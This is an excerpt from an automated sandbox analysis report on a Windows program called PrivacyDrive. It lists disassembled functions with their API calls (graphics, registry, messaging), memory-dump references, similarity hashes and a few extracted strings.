                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ControlDevice$CloseCreateErrorFileHandleLastMessagePeek_mallocwsprintf
                                • String ID: !@$%c:$0016$0022
                                • API String ID: 1442351435-2410355652
                                • Opcode ID: e0c5426e7a7dd257382277ac6b748210bbbca753af0dd1bbe43c75e0fc88bb46
                                • Instruction ID: 699ca7aee77b766940aa6adbea99c550cf5f938cdbd4e22d470b1e7f5bf5c36c
                                • Opcode Fuzzy Hash: e0c5426e7a7dd257382277ac6b748210bbbca753af0dd1bbe43c75e0fc88bb46
                                • Instruction Fuzzy Hash: 4971E670E14308AAEB10DBA5DC46BEFBAB4AF55708F14412BF501E72C1EBF86984C759
                                Function 0042C670 Relevance: 9.2, APIs: 6, Instructions: 188windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00421170: EnterCriticalSection.KERNEL32(005AE1C8,?,?,7563D392,?,?,?,?,?,?,?,?,?,00000000,0053DC33,000000FF), ref: 00421183
                                  • Part of subcall function 00421170: LeaveCriticalSection.KERNEL32(?,7563D392,?,?,7563D392,?,?,?,?,?,?,?,?,?,00000000,0053DC33), ref: 0042120D
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0042C703
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0042C72C
                                • EnterCriticalSection.KERNEL32(005AE1C8), ref: 0042C7AF
                                • LeaveCriticalSection.KERNEL32(005AE1C8,?,?,?,?,?,?,?), ref: 0042C852
                                • PostMessageW.USER32(00000111,000004DD,00000000), ref: 0042C86A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0042C88A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveLongMessageNamePath$PeekPost
                                • String ID:
                                • API String ID: 1745811624-0
                                • Opcode ID: 97459b1f7e085338524cef78e925561ecef61515c29b5a4903e1eeb3ee741132
                                • Instruction ID: 48213701d6ec8cc1f77b1a19ad10901f9acc0aea5090f1232270d96df87fc996
                                • Opcode Fuzzy Hash: 97459b1f7e085338524cef78e925561ecef61515c29b5a4903e1eeb3ee741132
                                • Instruction Fuzzy Hash: DF61D1316083519BD710AF64DC95B6FB7E4FFC5744F80092EFA4687290E7B9A808CB96
                                Function 0041A982 Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 0041AA11
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000001), ref: 0041AA29
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 0041AA42
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000003), ref: 0041AA5B
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 0041AA77
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,00000000,?,?,?,FF646464), ref: 0041AACB
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawFlagsLinePen1SolidStyleTrimming
                                • String ID:
                                • API String ID: 1019150128-0
                                • Opcode ID: 0c7cd801f2e8b79ae5e794069d230d066160ccc3476be4fc033e6d1d9445a5b2
                                • Instruction ID: cb4c178fb7084e89f3ff7f45deec6abd5fe2373fc64e7f387b38af35324756ad
                                • Opcode Fuzzy Hash: 0c7cd801f2e8b79ae5e794069d230d066160ccc3476be4fc033e6d1d9445a5b2
                                • Instruction Fuzzy Hash: 19415971208305AFD714CF14CC45F5ABBE8FB98755F000A2DF985962E0D775A948CB96
                                Function 004A1430 Relevance: 9.1, APIs: 6, Instructions: 114windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,?,7563D392), ref: 004A146B
                                  • Part of subcall function 004195B0: GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                  • Part of subcall function 004195B0: GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                • GdipCreatePathGradientFromPath.GDIPLUS(00000000,?), ref: 004A14F2
                                  • Part of subcall function 004193F0: GdipSetPathGradientPresetBlend.GDIPLUS(?,00000000,?,00000004), ref: 00419443
                                • GdipSetPathGradientFocusScales.GDIPLUS(?), ref: 004A155C
                                • GdipFillPath.GDIPLUS(00000002,?,00000000), ref: 004A1576
                                • GdipDeleteBrush.GDIPLUS(?), ref: 004A158F
                                • GdipDeletePath.GDIPLUS(00000000), ref: 004A159F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$Gradient$CreateDelete$BlendBrushCloseFigureFillFocusFromPresetResetScales
                                • String ID:
                                • API String ID: 1027064271-0
                                • Opcode ID: 46a74715f39e323d377d7a5d684705038fd23d2524ebcf6ac418d0938d3a12ba
                                • Instruction ID: 0f23a0c0f4f8379d9378d5caa7573e4fe7b431adac56c90f6d65c828a72fdaaf
                                • Opcode Fuzzy Hash: 46a74715f39e323d377d7a5d684705038fd23d2524ebcf6ac418d0938d3a12ba
                                • Instruction Fuzzy Hash: C5417771D0124CEFDB01DFA5D845BDEBBB8FF59314F10421AE811A7290EB316A85DB90
                                Function 004334D0 Relevance: 9.1, APIs: 6, Instructions: 114windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePath.GDIPLUS(00000000,?,7563D392,00000000,?,?), ref: 0043350B
                                  • Part of subcall function 004195B0: GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                  • Part of subcall function 004195B0: GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                • GdipCreatePathGradientFromPath.GDIPLUS(00000000,?), ref: 00433592
                                  • Part of subcall function 004193F0: GdipSetPathGradientPresetBlend.GDIPLUS(?,00000000,?,00000004), ref: 00419443
                                • GdipSetPathGradientFocusScales.GDIPLUS(?), ref: 004335FC
                                • GdipFillPath.GDIPLUS(?,?,00000000), ref: 00433616
                                • GdipDeleteBrush.GDIPLUS(?), ref: 0043362F
                                • GdipDeletePath.GDIPLUS(00000000), ref: 0043363F
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$Gradient$CreateDelete$BlendBrushCloseFigureFillFocusFromPresetResetScales
                                • String ID:
                                • API String ID: 1027064271-0
                                • Opcode ID: 96a32a6726cf0e7462fda4e4e2d1581cbc6da21a1256417115460b718b87573e
                                • Instruction ID: 3193731d80dc03a79ec8f495aeb0e55a02c248bd65a2315c1844a197df9a6016
                                • Opcode Fuzzy Hash: 96a32a6726cf0e7462fda4e4e2d1581cbc6da21a1256417115460b718b87573e
                                • Instruction Fuzzy Hash: 13417771D0124CEFDB01DFA5D945BDEBBB8FF59314F10421AE811A7290EB306A89CB90
                                Function 00426880 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,?,7563D392), ref: 004268D0
                                • GdipSetPenDashArray.GDIPLUS(00000000,40000000,00000002), ref: 004268E9
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 0042693C
                                • GdipSetPenColor.GDIPLUS(?,64FFFFFF), ref: 00426951
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 0042699E
                                • GdipDeletePen.GDIPLUS(?), ref: 004269B5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DrawLine$ArrayColorCreateDashDeletePen1
                                • String ID:
                                • API String ID: 2420209806-0
                                • Opcode ID: 88626d40c6255a05d4940b8dc963fcfb8880ce726fc1f4404bdc206c21d00123
                                • Instruction ID: 9873abff9a08ba6f93b20aaffb79cb3ca0c1a085dadd2560cc221db21d384360
                                • Opcode Fuzzy Hash: 88626d40c6255a05d4940b8dc963fcfb8880ce726fc1f4404bdc206c21d00123
                                • Instruction Fuzzy Hash: 3A412A71A1470AEFDB01DF65C845AAEFBB4FF59250F10831AE815A32A0E731A851DB90
                                Function 00419A00 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,?,7563D392), ref: 00419A52
                                • GdipSetPenDashArray.GDIPLUS(00000000,40000000,00000002), ref: 00419A6B
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 00419AB5
                                • GdipSetPenColor.GDIPLUS(?,?), ref: 00419ACA
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 00419B11
                                • GdipDeletePen.GDIPLUS(?), ref: 00419B28
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$DrawLine$ArrayColorCreateDashDeletePen1
                                • String ID:
                                • API String ID: 2420209806-0
                                • Opcode ID: d37cb8e4f82ef219d03973394140a9d4c6849fb66b1d352c36181dedd20040b4
                                • Instruction ID: ee8cb62ab2451e0828500fc1fe84e794faf17f67ca449c772ab1fb62a3a8d302
                                • Opcode Fuzzy Hash: d37cb8e4f82ef219d03973394140a9d4c6849fb66b1d352c36181dedd20040b4
                                • Instruction Fuzzy Hash: 4A416971A0470AEFDB01DFA5CC45BAEBBB4FF89350F10862AE415A32A0E730A950DF51
                                Function 004195B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                • GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                • GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipPath$CloseFigureReset
                                • String ID:
                                • API String ID: 1165678104-0
                                • Opcode ID: 9b456eee7caa8cd7400d12114530425a58d208804b994febc350a3e22252b5df
                                • Instruction ID: d2abe810883e9127a5072a582f8e754f657d44ff77088b5ba8e8c91eca39bea1
                                • Opcode Fuzzy Hash: 9b456eee7caa8cd7400d12114530425a58d208804b994febc350a3e22252b5df
                                • Instruction Fuzzy Hash: C1314A71504209EFDB209F69DE64AABBFF9EF44745F10842DF88887610D732E910EB60
                                Function 0042B860 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateFontFamilyFromName.GDIPLUS(0042A076,00000000), ref: 0042B8A3
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(005BD8A8), ref: 0042B8E0
                                • GdipCreateFont.GDIPLUS(00000000,?,?,00000002,00000000), ref: 0042B90D
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(005BD8A8,?,?,00000002,00000000), ref: 0042B933
                                • GdipCreateFont.GDIPLUS(?,?,?,00000002,00000000,?,?,00000002,00000000), ref: 0042B960
                                • GdipDeleteFontFamily.GDIPLUS(00000000,?,?,00000002,00000000), ref: 0042B973
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FontGdip$Family$Create$GenericSansSerif$DeleteFromName
                                • String ID:
                                • API String ID: 2842780952-0
                                • Opcode ID: 1317ae90b54967c85b75c1f9773daaad309c86fd4e35f64feb8aee5a7dc3f866
                                • Instruction ID: 44efaea698091796832b34f7aba718d91fc3679415ee51dfa0ecb132b2631af9
                                • Opcode Fuzzy Hash: 1317ae90b54967c85b75c1f9773daaad309c86fd4e35f64feb8aee5a7dc3f866
                                • Instruction Fuzzy Hash: 8E318BB5A00305EFDB14DF55E854B6ABBF4FB0A711F10822EF951A7390E735A904DBA0
                                Function 004B9450 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 275COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: t=X$t=X
                                • API String ID: 4104443479-1178391202
                                • Opcode ID: 79a9f8eebf31098dbf47203287711b78fd87398bf3c147cf498bd59d48a32082
                                • Instruction ID: 576e28fcdbd6255d9ee24f4616a54731efba306f999c106dd8af0492228bc50d
                                • Opcode Fuzzy Hash: 79a9f8eebf31098dbf47203287711b78fd87398bf3c147cf498bd59d48a32082
                                • Instruction Fuzzy Hash: B2A17F71204605BBDB14DF21CC45FDBBBE9FF89744F04051ABA58CA290EB34E954CBA6
                                Function 004B48D0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 251registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,7563D392,0040FFE5,005BE234,?,00000000,0054AA91,000000FF,?,004B2304), ref: 004B493D
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,0054AA91,000000FF,?,004B2304,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B49BC
                                • _memmove.LIBCMT ref: 004B4B95
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: QueryValue$_memmove
                                • String ID: ProgramVerify.cpp$aes
                                • API String ID: 105235180-4043292328
                                • Opcode ID: fe84bf6162802b2620aff083837fbc25075e08b544c2c5f19fe12840beed64c6
                                • Instruction ID: d9ba1fa1d14e7f405cab6b5400da9796704bace275dc7e0dd889cf08e4c9ef6b
                                • Opcode Fuzzy Hash: fe84bf6162802b2620aff083837fbc25075e08b544c2c5f19fe12840beed64c6
                                • Instruction Fuzzy Hash: A8A1B571900219ABDB20DB64CD4AFDEB7B4BF54704F0041A9F628A6292D734BE90DF65
                                Function 004B4550 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 220registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,00000288,?,00000288,?,00000000,00000000), ref: 004B4853
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Value
                                • String ID: !@$%sPortable.xml$aes$t=X
